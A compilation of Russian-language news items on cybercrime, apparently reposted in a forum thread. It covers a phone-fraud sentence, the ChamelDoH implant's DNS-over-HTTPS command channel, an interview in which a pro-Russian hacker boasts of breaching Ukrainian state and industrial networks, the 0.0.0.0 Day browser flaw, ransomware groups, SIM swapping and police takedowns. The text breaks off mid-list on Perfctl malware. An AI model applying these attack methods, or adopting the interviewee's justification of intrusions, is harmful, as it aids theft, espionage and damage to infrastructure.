По информации Telegram-канала Дзержинского райсуда, Звонникова выполняла роль курьера – она должна была забирать деньги у жертв, предварительно обработанных мошенниками по телефону. По результатам расследования стало известно, что группа злоумышленников, в которой состояла Звонникова, звонила пожилым россиянам и представлялась сотрудниками правоохранительных органов. Они в красках рассказывали своим жертвам историю о том, что их родственники попали в ДТП, и что нужно срочно заплатить деньги во избежание привлечения этого родственника к уголовной ответственности.
По данным следствия, мошенники пытались обмануть как минимум пятерых жителей России из Волгограда и Ахтубинска (Астраханская область) на общую сумму почти 2,16 млн руб., но деньги Звонникова собрать не успела – ее задержали сотрудники органов правопорядка.
Могло быть и хуже
Два года колонии общего режима – это очень щадящий приговор, поскольку Звонникову судили сразу по двум статьям УК РФ – ч. 3 ст. 30 (приготовление к преступлению и покушение на преступление) и ч. 4 ст. 159 (мошенничество, совершенное организованной группой либо в особо крупном размере или повлекшее лишение права гражданина на жилое помещение).
Подсудимая действовала в составе группы лиц, но другие ее участники по этому
делу не проходят
Максимальное наказание по данным статьям – это 10 лет лишения свободы и штраф в размере до 1 млн руб. или в размере заработной платы или иного дохода осужденного за период до трех лет. Звонникова проведет в тюрьме в пять раз меньше времени, но штраф ей выплатить придется – по решению суда он составил 828 тыс. руб.
На момент выпуска материала приговор Дзержинского райсуда Волгограда в силу не вступил. Он был оглашен 12 марта 2024 г., и с этого момента у Звонниковой и ее адвокатов есть 15 календарных дней на его обжалование.
Молниеносное рассмотрение дела
Редакция CNews нашла в картотеке суда дело Анастасии Звонниковой. Судя по датам, его рассмотрение было весьма стремительным.
Дело поступило в Дзержинский райсуд Волгограда 26 января 2024 г. Через четыре часа оно было передано судье Светлане Долговой. Первое заседание по нему состоялось 6 февраля 2024 г. Следующее заседание откладывалось дважды, в том числе и по причине неявки в зал суда подсудимой.
Дело рассмотрели за полтора месяца
12 марта 2024 г. состоялось итоговое на момент выпуска материала заседание суда, на котором Анастасии Звонниковой был вынесен приговор. Судя по карточке дела, апелляцию сторона защиты в лице адвоката Дмитрия Бирюкова пока не подавала.
Почему мошенники звонят россиянам
Жители России ежедневно сталкиваются со звонками мошенников и спамеров, и меньше их не становится. При этом у всех крупнейших операторов связи есть собственные средства борьбы с такими вызовами, а на уровне государства запущена система «Антифрод» за авторством Роскомнадзора, к которой обязаны подключиться все действующие на территории России операторы под угрозой штрафов и отзыва лицензии.
Также летом 2022 г. «Большая четверка» совместно с Федеральной антимонопольной службой России (ФАС) запустила систему жалоб на номера, с которых поступают мошеннические вызовы. Она позволяет блокировать эти номера.
Но, судя по всему, всех перечисленных мер недостаточно, чтобы раз и навсегда избавить россиян от звонков надоедливых рекламщиков мошенников и до нуля снизить им риск попасться на уловки звонящих и потерять деньги, а также движимое и недвижимое имущество. В марте 2024 г. CNews писал, что для этого требуется еще как минимум одна антимошенническая система, в рамках которой операторы мобильной связи будут напрямую сотрудничать с банками.
Китайцы довели до ума идею устанавливать связь с командными серверами через DNS-over-HTTPS. Пару лет назад был прототип под винду, а теперь в диком интеренте засветился полноценный вредонос под Linux. Такой трафик выглядит как совершенно обычный HTTPS и обнаружить хоть что-то, не говоря про отфильтровать, задача примерно нерешаемая. Но даже, если ты каким-то образом решишь эту проблему, окажется, что используются абсолютно легитимные DoH- серверы от гугла и клаудфлары, и ситуация станет совсем грустной.
Китайская группа угроз «ChamelGang» заражает устройства Linux с помощью ранее неизвестного имплантата под названием «ChamelDoH», который позволяет осуществлять связь DNS через HTTPS с серверами злоумышленников.
Конкретный субъект угрозы был впервые задокументирован [Positive Technologies](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat- intelligence/new-apt-group-chamelgang/) еще в сентябре 2021 года ; однако исследователи сосредоточились только на инструментарии Windows.
В отчете, опубликованном вчера [Stairwell](https://stairwell.com/news/chamelgang-and-chameldoh-a-dns-over- https-implant/) и предоставленном BleepingComputer, описывается новый имплантат Linux, написанный на C++, который расширяет арсенал злоумышленников для вторжений и, соответственно, индикаторы компрометации злоумышленников.
Связь между ChamelGang и новой вредоносной программой для Linux основана на домене, ранее связанном с злоумышленником, и пользовательском инструменте повышения привилегий, обнаруженном Positive Technologies в прошлых кампаниях ChamelGang.
Протокол DNS (система доменных имен) используется программным обеспечением и операционными системами для преобразования удобочитаемых имен хостов в IP- адреса, которые затем используются для сетевых подключений.
Однако DNS-запросы отправляются в виде незашифрованного простого текста, что позволяет организациям, интернет-провайдерам и другим лицам отслеживать DNS- запросы.
Поскольку это считается риском для конфиденциальности и позволяет правительствам подвергать Интернет цензуре, был создан новый протокол DNS под названием DNS-over-HTTPS для шифрования запросов DNS, чтобы их нельзя было отследить.
Однако это обоюдоострый меч, поскольку вредоносное ПО может использовать его в качестве эффективного зашифрованного канала связи, что затрудняет отслеживание программным обеспечением безопасности вредоносного сетевого взаимодействия.
В случае ChamelDoH DNS-over-HTTPS обеспечивает зашифрованную связь между зараженным устройством и сервером управления и контроля, что делает вредоносные запросы неотличимыми от обычного HTTPS-трафика.
Кроме того, DoH может помочь обойти локальные DNS-серверы, используя совместимые с DoH серверы, предоставленные авторитетными организациями, чего в данном случае не наблюдалось.
Наконец, поскольку DNS-запросы используют законные серверы DoH от Google и Cloudflare, их блокировка практически невозможна без воздействия на законный трафик.
ChamelDoH использует два ключа, хранящиеся в его конфигурации JSON, «ns_record» и «doh», чтобы получить имена хостов C2 и список законных облачных провайдеров DoH, которыми можно злоупотреблять для выполнения запросов DoH.

Конфигурация JSON
Все сообщения вредоносных программ шифруются с использованием AES128 и модифицированной кодировки base64, которая содержит заменители не буквенно- цифровых символов. Передаваемые данные затем добавляются в качестве имен хостов к перечисленным серверам управления и контроля вредоносного ПО.
Эта модификация позволяет вредоносному ПО отправлять TXT-запросы для доменов, содержащих закодированные сообщения сервера управления и контроля (C2), скрывая природу этих запросов и снижая вероятность обнаружения.
Например, при запросе записи TXT запрос DoH от вредоносного ПО будет использовать <encoded_data>.ns2.spezialsec[.].com. Вредоносный DNS-сервер, получив запрос, затем извлечет и расшифрует закодированную часть, чтобы получить отфильтрованные данные с зараженного устройства.
C2 ответит закодированной TXT-записью, содержащей команды, которые вредоносная программа должна выполнить на зараженном устройстве.
Диаграмма связи для ChamelDoH
После запуска вредоносная программа соберет основные данные о своем хосте, включая имя, IP-адрес, архитектуру ЦП и версию системы, и сгенерирует уникальный идентификатор.
Исследователи Stairwell обнаружили, что ChamelDoH поддерживает следующие команды, которые его операторы могут выполнять удаленно с помощью записей TXT, полученных в запросах DNS-через-HTTPS:
Анализ Stairwell показал, что ChamelDoH впервые был загружен на VirusTotal в декабре 2022 года.
На момент написания этой статьи он не был помечен как вредоносный ни одним из антивирусных движков платформы.
источник https://bleepingcomputer[.]com/news/security/chinese-hackers-use-dns- over-https-for-linux-malware-communication/
разрушительных кибератак
Российские хакеры получили доступ к нескольким заводам, электростанциям и провайдерам на Украине. Они также проникли в сети объектов критической инфраструктуры и могут повлиять на их работу, но основная цель таких атак — закрепиться в информационной сети предприятия, чтобы как можно дольше получать информацию, а не отключение объекта. Об этом «Газете.Ru» рассказал Хеш, основатель хакерской группы Zаря, которая известна прежде всего по взлому СБУ. По словам Хеша, русские хакеры не стремятся сеять разрушения и хаос. Подробнее о настоящих целях хакерских групп и перебежчиках – в интервью «Газете.Ru».
– Как к тебе можно обращаться?
– Я представляюсь как Хеш. Для своих просто Хеши.
– Как давно ты занимаешься хакингом?
– Примерно восемь лет. Начинал с того же, с чего и многие мои коллеги: изучал
языки программирования.
– Я знаю, что раньше ты участвовал в KillNet. Почему ты ушел из этой
группы?
– Решил стать самостоятельным звеном в этой войне, вести свою политику и ни от
кого не зависеть.
– Прежде всего «Zаря» известна взломом и серией сливов
данныхСБУ. Между тем у
вас наверняка были и другие атаки. Какие ты считаешь наиболее выдающимися?
– Взлом крупнейшего оператора Западной Украины UARNet, где хостятся в основном
государственные учреждения: институты, палаты, рады и так далее. Совместный с
«Берегинями» и XakNet взлом СБУ, конечно же. Взлом ведущего информационно-
аналитического и экспертного центра Украины в сфере внешних и внутренних
рынков товаров и услуг «Держзовнішінформ».
Многое еще находится в разработке и происходит в настоящий момент. Скоро все
узнаете.
– Все интересное из документов СБУ уже опубликовано или остались еще какие-
то козыри?
– Конечно, остались, их очень много. Но если мы об этом еще не писали, то это
значит, что пока в силу разных причин мы этого сделать не можем. Скажу только
то, что нам попадается очень много служебных документов о действующих
сотрудниках СБУ.
– Что, кроме репутационного ущерба, получают жертвы ваших атак?
– Суть наших атак в том, что мы нацелены исключительно на государственные и
стратегические объекты. Соответственно, у цели «утекает» не только репутация,
но и внутренние документы: их планы и проекты, почта, переписки, списки
сотрудников.
В результате наших атак Украине приходится пересматривать стратегию, менять
планы, переназначать людей и так далее. Данных, которые находятся у нас,
хватит, чтобы обанкротить половину госучреждений и заставить все СБУ резко
поменять свое место дислокации и сотрудников.
– Вы пытались передавать украденные у СБУ данные российским
правоохранительным органам?
– Из рук в руки – нет. Вопреки предубеждениям и стереотипам, мы не ездим в
Кремль с дисками, набитыми информацией. Как минимум, по той причине, что выше
всего мы ценим свою анонимность и безопасность.
Все, что мы считаем необходимым опубликовать, мы выкладываем в наш официальный
Telegram-канал, на который, я думаю, подписаны в том числе и представители
правоохранительных
органов.
– Как бы ты оценил уровень информационной безопасности украинских
организаций?
– В зависимости от цели уровень безопасности сильно разнится. Хочется,
конечно, посмеяться над ними и сказать, что там все очень плохо, работники
дураки, а системы – просроченный пиратский шлак, не обновлявшийся со времен
Майдана. Но это далеко не всегда так. При этом и слишком высоко оценить их
безопасность я не могу.
– Кибербезопасники часто рассказывают, что хакерская атака на завод или
электростанцию может привести к техногенной катастрофе. Насколько это реально
с твоей точки зрения?
– Вполне реально.
Как мы можем резко отрубить интернет у половины
Киева, так и наши друзья вполне
могут обесточить почти всю Украину. В этом огромный минус перехода на так
называемые умные системы управления на промышленных предприятиях.
Однако такая атака – это огромный объем работ. В одиночку такое провернуть
невозможно.
– Вы обсуждали когда-нибудь атаки на промышленные предприятия Украины?
— Конечно. Были моменты, когда мы получали контроль над всем заводом вплоть до
управления станками.
– Вы их отключили?
– Нет.
Дело в том, что подобные [разрушительные] атаки имеют далеко идущие
последствия и широкий резонанс. Мы предпочитаем действовать аккуратно и
безобидно в отношении обычных граждан. Мы воины, а не террористы.
– Как думаешь, конфликт
междуРоссией и Украиной когда-
нибудь дойдет до разрушительных кибератак на промышленные предприятия?
–С нашей стороны, конечно же нет. Повторюсь – мы не террористы. Если же вопрос
о захвате контроля, то да. Это уже происходит. Правда, никто, скорее всего, не
будет отключать то же электричество.
Как бы это сказать…
У атак на объекты критической инфраструктуры есть две цели. Первая – иметь
контроль. Не для того, чтобы обязательно что-то выключить, а чтобы просто
иметь такую возможность на всякий случай. Вторая – закрепиться в
информационной сети предприятия, чтобы как можно дольше получать информацию.
– Почему пророссийские хакерские группы редко используют крайне эффективные
вирусы-шифровальщики?
– Как я говорил ранее, цель наших хакеров это закрепиться и шпионить, а не
громко ворваться и все нафиг разнести. Шифровальщики – это как раз для второго
сценария.
– Со стороны каких стран ближнего зарубежья наблюдаются атаки на Россию?
– В основном это Латвия и
Литва. Иногда
Эстония. Но они не всегда
успевают – наши специалисты реагируют быстрее.
– Есть ли среди партнеров русских хакеров белорусы?
– Конечно. Очень много.
Белорусы – наши братья. На них всегда можно положиться.
– Бывают ли перебежчики с украинской стороны?
– На удивление их очень много. Мы с ними часто работаем – очень продуктивные
ребята, оказывают неоценимую помощь.
– Пытались ли к вам проникнуть шпионы из ЦИПсО (Центр информационно-
психологических операций, подразделение ВСУ, которое занимается кибератаками,
– прим. ред.)?
– Почти каждый день. Опять же, не могу сказать, как мы их вычисляем, иначе они
поумнеют.
– Есть ли какая-то верификация новых участников в «Zаре»? Что вы захотите
узнать обо мне, если я захочу помочь вам?
– Конечно, все наши участники проходят тщательную проверку перед вхождением в
основной состав.
В первую очередь, нам будет интересен опыт и возможности человека. Затем –
причина, по которой он хочет к нам присоединиться. После мы проведем
внутреннее расследование: изучим интересы человека и выясним, не являетесь ли
он действующим или потенциальным шпионом.
Ну и под конец заставим раскрыть свой потенциал в командной работе, проверим
возможности. Задания у нас сразу «боевые», без прелюдий.
– Общаясь с тобой до интервью, мне показалось, что ты не очень хочешь
говорить про свою связь с KillNet. Поправь, если я не прав.
– Скорее прав, чем нет.
– Почему? Между тобой и KillMilk (бывший лидер KillNet, – прим. ред.)
случился какой-то конфликт?
– Да нет, ничего такого. Я и с другими группами общаюсь – не только с KillNet.
Просто, как бы это сказать… Такая информация должна оставаться за кадром,
чтобы не мешать текущей работе. Ну, и из этических соображений тоже, наверное,
об этом говорить не стоит.
– Тем не менее, «Zаря» появилась после твоего выхода из KillNet?
– Не совсем. Изначально «Zаря» появилась как один из отрядов KillNet. С моей
подачи. Тогда мы в разное время назывались по разному: 0x000000, «Карантин» и
не только. Просто потом мы пришли к «Zаре» и остановились на этом названии.
– В данный момент «Zаря» – это тоже сайд-проект KillNet или полностью
независимая группа?
– Раньше была структурой KillNet, да. Я занимал у них одну из руководящих
должностей: администрировал группы, руководил набором людей, согласовывал
цели, анализировал их. Сейчас мы сами по себе.
– Чем «Zаря» отличается от KillNet?
– Еще будучи в составе KillNet, мы были единственным подразделением, которое
занималось исключительно взломом целей. Мы не занимались DDoS'ом. По сути, это
единственное, чем мы отличались от других тогда и отличаемся этим от многих
сейчас.
– Чем ты занимаешься в «Zаре»? Только руководишь или принимаешь еще участие
в хакинге?
– Помимо курирования я занимаюсь всем, чем занимаются мои ребята. Любой
руководитель должен быть примером для своих людей и уметь дать старт во всех
сферах, будь то хакинг, программирование или даже творчество.
– В чем заключается работа руководителя хакерской группы?
– Скажу за себя. Я забочусь о «Zаре» настолько, насколько это возможно.
Улаживаю конфликты, предотвращаю утечки, обеспечиваю безопасность и
анонимность каждому участнику, поддерживаю дружескую атмосферу. Мои люди – мое
все. Также на мне лежит ответственность за контакты с другими группировками,
дипломатию.
– Кроме тебя в «Zаре» есть выходцы из Killnet?
– Да, большая часть.
– Для чего, на твой взгляд, тот же KillNet занимается диверсификацией своих
подразделений? Почему создается 10 маленьких якобы независимых групп вместо
одной, но большой?
– Во-первых, разбив людей на группы и привязав к ним своего руководителя,
банально проще управлять. Участников зачастую не один и не пять, а под сотню.
Одному главе с таким количеством не справиться – очень большая нагрузка. Во-
вторых, так эффективнее с точки зрения ведения информационной войны. Деление
воздействует на врага психологически – у него разбегаются глаза, ему сложнее
понимать, когда и от кого ждать атаку. Согласись, гораздо проще контролировать
одного врага, а не пять.
– Можешь перечислить наиболее активные хак-объединения, которые выступают за
РФ, кроме «Zари» и KillNet?
– Конечно. В основном это наши друзья: Берегини, XakNet, КиберАрмия и
Anonymous Russia, а
также RaHDit, Джокер ДНР, NoName057, Zsecnet. Это те, кого могу вспомнить.
– Сколько из них основаны выходцами из Killnet?
– Насколько я знаю, только мы и Anonymous Russia. Могу ошибаться.
– Почему все хотят сделать свой Killnet?
– Не совсем так. Многие хотят участвовать в кибервойне, но не все хотят делать
это именно как KillNet. Создать свою команду и стать «крутыми как KillNet»?
Да. Сделать точную копию KillNet? Нет.
Source: https://www.gazeta.ru/tech/2022/11/06/15734689.shtml
Администрация президента США Джо Байдена собирается усилить контроль над транзакциями с криптовалютой. Эта произойдёт из-за необходимости пресечения действий хакеров, которые используют вирусы-вымогатели.
Американские власти собираются более жестко контролировать транзакции с
криптовалютой.
По словам источников Bloomberg, власти США планируют «более тщательно
отслеживать переводы» денежных средств, представленных в криптовалюте, которые
компании, организации и ведомства осуществляют в качестве платы
киберпреступникам. Хакеры могут требовать средства за возвращение похищенной
информации или восстановление доступа к компьютерным системам.
Ранее советник президента США по национальной безопасности Джейк Салливан
заявил, что администрация Соединенных Штатов на текущей неделе объявит о
дополнительных шагах, направленных на противодействие кибератакам с
использованием вирусов-вымогателей.
[https://www.europol.europa.eu/media...ear-for-cybercriminals-vpnlabnet-goes-
offline](https://www.europol.europa.eu/media-press/newsroom/news/unhappy-new-
year-for-cybercriminals-vpnlabnet-goes-offline)
https://www.bleepingcomputer[.]com/...s-down-vpn-service-used-by-ransomware-
groups/
This week, law enforcement authorities took action against the criminal misuse of VPN services as they targeted the users and infrastructure of VPNLab.net. The VPN provider’s service, which aimed to offer shielded communications and internet access, were being used in support of serious criminal acts such as ransomware deployment and other cybercrime activities.
Click to expand...
On 17 January, disruptive actions took place in a coordinated manner in Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the United States and the United Kingdom. Law enforcement authorities have now seized or disrupted the 15 servers that hosted VPNLab.net’s service, rendering it no longer available. Led by the Central Criminal Office of the Hannover Police Department in Germany, the action took place under the [EMPACT](https://www.europol.europa.eu/crime-areas-and- trends/eu-policy-cycle-empact) security framework objective Cybercrime - Attacks Against Information Systems.
Click to expand...
что происходит?
Исследователи в области кибербезопасности выявили критическую уязвимость, которой дали имя «0.0.0.0 Day». Судя по всему, проблема затрагивает все популярные браузеры, а вредоносные сайты с её помощью могут проникнуть в локальные сети.
Как [пишет](https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost- apis-from-the-browser) исследователь Oligo Security Ави Лумельски:
«Это фундаментальный недостаток в принципе обработки сетевых запросов со стороны браузеров. Условные злоумышленники могут получить доступ к конфиденциальным службам, работающим на локальных устройствах».
Таким образом, безобидный IP-адрес вроде 0.0.0.0 может использоваться для раскрытия локальных сервисов, получения несанкционированного доступа и даже удалённого выполнения кода.
Как отметили исследователи, эта брешь существует с 2006 года.
Среди затронутых 0.0.0.0 Day браузеров — Google Chrome / Chromium, Mozilla Firefox и Apple Safari, которые позволяют внешним веб-ресурсам взаимодействовать с софтом, работающим локально на Linux и macOS.
Интересно, что брешь не угрожает пользователям Windows, поскольку там IP-адрес блокируется на уровне самой операционной системы.
Как выяснили в Oligo Security, общедоступные сайты в доменной зоне «.com» могут взаимодействовать со службами, работающими в локальной сети, и даже выполнять произвольный код на устройстве посетителя с помощью адреса 0.0.0.0 вместо localhost/127.0.0.1.
Таким образом, это также является вектором обхода функциональности Private Network Access (PNA), задача которой — запрещать ресурсам прямой доступ к конечным точкам.
Любое запущенное на Localhost веб-приложение, до которого можно добраться через 0.0.0.0, уязвимо для «0.0.0.0 Day». Для эксплуатации атакующий должен отправить специально созданный пейлоад с POST-запросом на 0.0.0[.]0:4444.
Хакеры похитили более $320 млн у криптовалютной платформы Wormhole
Администрация Wormhole предложила хакерам $10 млн за возвращение средств и предоставление сведений об уязвимости.
Хакеры воспользовались уязвимостью в кроссчейн-криптоплатформе Wormhole и похитили более $320 млн в криптовалюте (по текущему курсу).
Wormhole — платформа, позволяющая пользователям передавать криптовалюту через разные блокчейны. Платформа блокирует исходный токен в смарт-контракте, а затем создает «обернутую» версию сохраненного токена, которую можно перенести в другую цепочку блоков. Платформа поддерживает блокчейны Avalanche, Oasis, Binance Smart Chain, Ethereum, Polygon, Solana и Terra.
Wormhole отключила свою платформу на время проведения расследования и анализа уязвимости в своей сети. С помощью уязвимости хакеры создали и украли 120 тыс. токенов Ether на блокчейне Solana. Из этих 120 тыс. токенов злоумышленники конвертировали 80 тыс. в Ethereum, а остальные оставили в блокчейне Solana, где и начали их продавать.
Позднее администрация Wormhole подтвердила, что хакеры украли 120 тыс. «обернутых» Ethereum (wEth).
По словам специалистов из компании Elliptic, представитель Wormhole отправил сообщение на адрес хакеров с предложением вознаграждения в размере $10 млн за информацию об эксплоите и возврат украденных средств.
Неизвестно, ответили ли хакеры на сообщение и готовы ли они работать с Wormhole для восстановления похищенных средств.
Министерство юстиции США сообщило об аресте 21-летнего Эрика Мейггса (Eric Meiggs) и 20-летнего Деклана Харрингтона (Declan Harrington). Их обвиняют по 11 пунктам, в том числе в сговоре, мошенничестве с использованием электронных средств, компьютерном мошенничестве и злоупотреблениях, а также в краже личных данных при отягчающих обстоятельствах.
Дело в том, что Мейггс и Харрингтон занимались так называемыми атаками SIM swap. Суть таких атак заключается в том, что преступник обращается к представителям сотового оператора своей жертвы и применяет социальную инженерию. К примеру, выдавая себя за настоящего владельца номера, злоумышленник заявляет, что потерял или сломал SIM-карту и добивается переноса номера на новую SIM-карту. Затем злоумышленники воруют привязанные к номеру телефона учетные записи, фактически похищая чужие личности полностью. Такие атаки часто используются для кражи крупных сумм в криптовалюте или компрометации дорогих Instagram-аккаунтов.
Следствие сообщает, что в основном жертвами Мейггса и Харрингтона становились руководители криптовалютных компаний, а также пользователи, у которых было значительное количество криптовалюты в кошельках на Coinbase или Block.io. Кроме того, мошенников интересовали владельцы особенно «ценных» аккаунтов в Instagram и Tumblr.
Так, обвиняемые похитили у неназванного жителя Аризоны криптовалюту на сумму 200 000 долларов за один раз. Еще 100 000 долларов были украдены у пострадавшего из Калифорнии, который дружил с другой целью злоумышленников — руководителем некоего блокчейн-бизнеса. Также криптовалюта на сумму 165 000 долларов была украдена у главы криптовалютного проекта из Иллинойса, и еще 35 000 долларов злоумышленники похитили из кошелька на Block.io, который принадлежал жителю Невады, владеющему сетью Bitcoin-банкоматов.
Хуже того, обвинительное заключение гласит, что в одном случае Мейггс угрожал убить жену пострадавшего, если не получит контроль нужной ему учетной записью в Instagram. Обычно в таких случаях мошенники брали телефонный номер жертвы «в заложники», а затем в качестве выкупа требовали предоставить им учетные записи от аккаунта в социальной сети. Но, видимо, в тот раз что-то пошло не так.
В общей сложности за период с ноября 2017 года по май 2018 года подозреваемые сумели или попытались украсть более 550 000 долларов США по крайней мере у 10 опознанных жертв из США. В этом же время Мейггс успел установить контроль над учетными записями в социальных сетях, принадлежавшим двум жертвам.
Теперь Мейггсу и Харрингтону грозит до 20 лет лишения свободы только по каждому обвинению в мошенничестве с использованием электронных средств связи, а каждый эпизод кражи личных данных при отягчающих обстоятельствах предусматривает дополнительные 2 года тюремного срока.
• Source: justice[.]gov/opa/press-release/file/1217436/download
Хакеры REvil зарабатывали сотни миллионов долларов, шифруя данные крупных компаний и требуя за них выкуп. Но зимой 2022 года эта агрессивная группировка понесла серьезный урон. В январе ФСБ по запросу США провела обыски у 14 человек, однако известны имена лишь восьми подозреваемых — их заключили под стражу.
Мы провели расследование и выяснили, что:
Пятеро подозреваемых учились вместе, в одной школе
Один из фигурантов мог служить в армии по контракту вплоть до момента
задержания
Другой подозреваемый владеет винным рестораном в историческом центре Санкт-
Петербурга
Но есть и те, кого следствие не называло. Например, жителя Барнаула Евгения Полянина — человека, которого открыто разыскивает ФБР в связи с деятельностью REvil. Мы выяснили, что он мог увлечься хакерством еще в 15-летнем возрасте, а начиналось все с заработка на российском порнотрафике.
подозреваемых по делу группировки REvil ](https://dailystorm.ru/rassledovaniya/blesk-i-nishcheta-koroley-hakerskogo- mira-daily-storm-publikuet-profayly-podozrevaemyh-po-delu-gruppirovki-revil)
Среди них — прапорщик, владелец винного ресторана и стример. Пятеро фигурантов — бывшие одноклассники
 dailystorm.ru
Аналитики Zscaler ThreatLabz [сообщили](https://www.zscaler.com/resources/industry-reports/threatlabz- ransomware-report.pdf), что неназванная компания из списка Fortune 50 заплатила вымогательской группировке Dark Angels рекордный выкуп в размере 75 млн долларов США.
«В начале 2024 года ThreatLabz обнаружила жертву, которая заплатила Dark Angels 75 млн долларов. Это превышает все известные ранее суммы. Такое достижение наверняка заинтересует других злоумышленников, которых захотят повторить этот успех, переняв ключевую тактику Dark Angels», — гласит отчет Zscaler Ransomware Report за 2024 год.
Click to expand...
Факт выплаты рекордного выкупа подтвердили и блокчейн-аналитики из компании
Chainalysis,
которые сообщили об этом в X.
Напомним, что ранее самым крупным выплаченным выкупом считался платеж [в
размере 40 млн
долларов](https://www.bloomberg.com/news/articles/2021-05-20/cna-financial-
paid-40-million-in-ransom-after-march-cyberattack), который страховой гигант
CNA заплатил хакерам из группировки Evil Corp.
Хотя специалисты Zscaler не сообщили, какая именно компания заплатила
злоумышленникам 75 млн долларов, они отмечают, что компания входит в список
Fortune 50, а сама атака произошла в начале 2024 года.
Одна из компаний из списка Fortune 50, подвергшаяся кибератаке в феврале 2024
года, это фармацевтический гигант
Cencora, занимающий 10-е место в
упомянутом списке. Интересно, что ни одна из вымогательских групп не взяла на
себя ответственность за эту атаку и не сливала данные Cencora, а это может
свидетельствовать о том, что выкуп действительно был выплачен.
Группировка Dark Angels появилась в мае 2022 года, когда начала атаковать
компании по всему миру. Как заведено в большинстве других вымогательских
групп, операторы Dark Angels проникают в корпоративные сети и развивают атаку
до тех пор, пока не получат административный доступ. Получив доступ к
контроллеру домена Windows, злоумышленники развертывают малварь шифрования на
всех устройствах в сети пострадавшей организации.
Одновременно с этим хакеры похищают данные со взломанных серверов, и эта
информация впоследствии используется в качестве дополнительного рычага для
давлению на жертву при выдвижении требований о выкупе.
В начале своей деятельности Dark Angels использовали шифровальщики для Windows
и VMware ESXi, основанные утекших в сеть исходниках
Babuk. Однако со временем группа
перешла на шифровальщик для Linux, который с 2021 года использовали операторы
Ragnar Locker.
Именно этот шифровальщик использовался в атаке Dark Angels на компанию Johnson
Controls, чтобы зашифровать серверы VMware ESXi. В ходе этой атаки Dark Angels
заявила, что похитила 27 ТБ корпоративных данных, и потребовала выкуп в
размере 51 миллиона долларов.
Специалисты Zscaler ThreatLabz пишут, что Dark Angels использует стратегию
«охоты на крупную дичь» (Big Game Hunting), которая заключается в том, чтобы
атаковать только небольшое количество крупных компаний в надежде на большие
выплаты, а не множество мелких компаний одновременно для получения
многочисленных, но небольших выкупов.
«Группа Dark Angels использует узконаправленный подход, обычно атакуя лишь одну крупную компанию за раз, — объясняют исследователи. — Это резко контрастирует с тактикой большинства группировок, занимающихся распространением вымогательского ПО, которые обычно атакуют всех без разбора и отдают большую часть атак на аутсорс своим партнерам, в число которых входят брокеры первоначального доступа и команды пентестеров».
Click to expand...
Специалисты Gemini Advisory сообщают, что на одном из хакерских форумов недавно были проданы около 900 000 подарочных карт, общей стоимостью 38 млн долларов.
Продавец лота не сообщил, как он получил данные, но заявил, что в его распоряжении имеется 895 000 подарочных карт 3010 компаний, включая Airbnb, Amazon, American Airlines, Chipotle, Dunkin Donuts, Marriott, Nike, Subway, Target и Walmart. База была выставлена на аукцион, где начальная стоимость составила 10 000 долларов, а блиц-цена — 20 000 долларов. Торги завершились быстро, то есть базу кто-то купил.
Аналитики отмечают, что обычно подарочные карты продаются за 10% от их стоимости. В данном случае цена составляла примерно 0,05% стоимости, а это говорит о том, что информация о 38 млн долларов, скорее всего, была преувеличением для привлечения внимания. Или же срок действия подарочных карт уже истек или истекал, то есть многие из них могли быть неактивны или имели низкий баланс.
Интересно, что на следующий день после продажи подарочных карт тот же злоумышленник выставил на продажу неполные данные 330 000 дебетовых карт (начальная цена 5000 долларов, блиц-цена — 15 000 долларов). В этот дамп вошли платежные адреса, номера карт, даты истечения срока действия и названия банков-эмитентов. То есть база не содержала имен держателей карт и CVV-кодов, необходимых для осуществления CNP-транзакций.
В Gemini Advisory предполагают, что эти платежные карты могли попасть в руки хакера в результате взлома сайта Cardpool.com, который имел место с 4 февраля по 4 августа 2019 года. Компрометация уже несуществующего Cardpool объясняет и то, где преступник взял такое количество подарочных карт.
Источник: xakep.ru/2021/04/07/gift-cards/
Европол провёл скоординированную между правоохранительными органами операцию «Морфеус», в ходе которой удалось положить почти 600 серверов Cobalt Strike. Последние использовались киберпреступниками для взлома сетей организаций.
В конце июня правоохранителям удалось зафиксировать IP-адреса, связанные с вредоносной активностью, а также доменные имена, ставшие частью инфраструктуры злоумышленников.
После сбора всех необходимых данных полицейские передали их интернет- провайдерам, чтобы последние отключили нелицензионные версии инструмента. Европол пишет в уведомлении следующее:
«В период между 24 и 28 июня правоохранительные органы пытались пресечь использование старых и нелицензионных версий инструмента для пентеста Cobalt Strike».
«В общей сложности с киберпреступной активностью были связаны 690 IP-адресов из 27 стран. По итогам операции 593 сервера удалось вывести из строя».
В операции «Морфеус» принимали участие полицейские из Австралии, Канады, Германии, Нидерландов, Польши и США. Им помогало Национальное агентство по борьбе с преступностью Соединённого Королевства.
Специалисты BAE Systems Digital Intelligence, Trellix, Spamhaus, abuse.ch также предложили свою помощь в борьбе с вредоносными серверами.
• Source: https://www.europol.europa[.]eu/media-press/newsroom/news/europol- coordinates-global-action-against-criminal-abuse-of-cobalt-strike
Вредоносное ПО Perfctl трудно обнаружить, оно сохраняется после перезагрузки и может выполнять широкий спектр вредоносных действий.
Тысячи машин под управлением Linux были заражены вредоносным штаммом, который отличается скрытностью, количеством неверных конфигураций, которые он может использовать, и широким спектром вредоносных действий, которые он может выполнять, сообщают [исследователи Ars Technica](https://arstechnica.com/security/2024/10/persistent-stealthy-linux- malware-has-infected-thousands-since-2021/).
Вредоносное ПО циркулирует по меньшей мере с 2021 года. По словам исследователей из Aqua Security, она устанавливается, используя более 20 000 распространенных неправильных конфигураций, что может сделать миллионы машин, подключенных к Интернету, потенциальными целями. Он также может использовать CVE-2023-33426, уязвимость с рейтингом серьезности 10 из 10, которая была исправлена в прошлом году в Apache RocketMQ, платформе для обмена сообщениями и потоковой передачи данных, которая присутствует на многих Linux-машинах.
Perfctl Storm
Исследователи называют вредоносную программу Perfctl - так называется
вредоносный компонент, который тайно добывает криптовалюту. Неизвестные
разработчики вредоносной программы дали процессу название, объединяющее
инструмент мониторинга perf Linux и ctl, аббревиатуру, обычно используемую в
инструментах командной строки. Характерной особенностью Perfctl является
использование имен процессов и файлов, которые идентичны или похожи на те, что
обычно встречаются в среде Linux. Такое именование - один из многих способов,
с помощью которых вредоносная программа пытается ускользнуть от внимания
зараженных пользователей.
Perfctl маскирует себя с помощью множества других уловок. Одна из них
заключается в том, что он устанавливает многие свои компоненты как руткиты -
особый класс вредоносных программ, скрывающих свое присутствие от операционной
системы и административных инструментов. Другие механизмы скрытности включают
в себя:
- Прекращение действий, которые легко обнаружить при входе нового
